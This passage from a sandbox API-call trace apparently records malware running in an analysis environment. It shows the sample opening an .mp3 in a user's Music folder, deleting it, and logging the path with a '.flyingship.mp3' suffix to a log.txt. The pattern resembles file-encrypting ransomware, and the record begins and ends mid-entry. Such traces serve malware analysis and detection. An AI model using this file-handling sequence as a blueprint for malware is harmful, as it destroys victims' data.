0x8 [0187.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0187.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.227] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84061af0, ftCreationTime.dwHighDateTime=0x1d5e3eb, ftLastAccessTime.dwLowDateTime=0x36fe5e90, ftLastAccessTime.dwHighDateTime=0x1d5da70, ftLastWriteTime.dwLowDateTime=0x36fe5e90, ftLastWriteTime.dwHighDateTime=0x1d5da70, nFileSizeHigh=0x0, nFileSizeLow=0x12af2, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="uvLMHuUMLBjPgdhq.mp3", cAlternateFileName="UVLMHU~1.MP3")) returned 0x90af58 [0187.227] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0187.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0187.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0187.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0187.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.227] CharLowerBuffW (in: lpsz="byte[76530]", cchLength=0xb | out: lpsz="byte[76530]") returned 0xb [0187.228] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0187.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0187.228] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0187.228] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0187.229] FreeLibrary (hLibModule=0x75c90000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0187.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0187.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0187.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0187.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0187.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.230] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0187.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0187.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.230] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0187.230] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.230] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\uvlmhuumlbjpgdhq.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0187.230] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0187.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0187.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0187.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0187.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0187.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0187.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0187.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0187.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0187.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0187.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0187.231] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0187.231] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.231] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.232] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.232] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0187.232] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.232] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.232] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.232] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3", lpFilePart=0x0) returned 0x5d [0187.233] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84061af0, ftCreationTime.dwHighDateTime=0x1d5e3eb, ftLastAccessTime.dwLowDateTime=0x36fe5e90, ftLastAccessTime.dwHighDateTime=0x1d5da70, ftLastWriteTime.dwLowDateTime=0x14d30ac0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x12af2, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="uvLMHuUMLBjPgdhq.mp3", cAlternateFileName="UVLMHU~1.MP3")) returned 0x90af58 [0187.234] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\uvlmhuumlbjpgdhq.mp3")) returned 1 [0187.235] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84061af0, ftCreationTime.dwHighDateTime=0x1d5e3eb, ftLastAccessTime.dwLowDateTime=0x36fe5e90, ftLastAccessTime.dwHighDateTime=0x1d5da70, ftLastWriteTime.dwLowDateTime=0x14d30ac0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x12af2, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="uvLMHuUMLBjPgdhq.mp3", cAlternateFileName="UVLMHU~1.MP3")) returned 0 [0187.236] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0187.236] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.236] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0187.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0187.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0187.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0187.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0187.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0187.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0187.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0187.237] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0187.237] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0187.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0187.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.237] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.237] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0187.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0187.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.238] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0187.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0187.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0187.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0187.238] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0187.238] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0187.239] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.239] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0187.239] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.239] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0187.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0187.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.240] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0187.241] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x270f, lpOverlapped=0x0) returned 1 [0187.241] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0187.241] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x270f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.241] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0187.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0187.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0187.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.flyingship.mp3\r\n", cchWideChar=107, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 107 [0187.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6b) returned 0x906f38 [0187.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.flyingship.mp3\r\n", cchWideChar=107, lpMultiByteStr=0x906f38, cbMultiByte=107, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.flyingship.mp3\r\n", lpUsedDefaultChar=0x0) returned 107 [0187.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0187.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0187.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0187.241] WriteFile (in: hFile=0x120, lpBuffer=0x8fecd8*, nNumberOfBytesToWrite=0x6a, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8fecd8*, lpNumberOfBytesWritten=0x87f43c*=0x6a, lpOverlapped=0x0) returned 1 [0187.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0187.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.242] CloseHandle (hObject=0x120) returned 1 [0187.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0187.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0187.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0187.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0187.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0187.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0187.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0187.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0187.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0187.245] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0187.246] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0187.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0187.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0187.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0187.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0187.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0187.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | 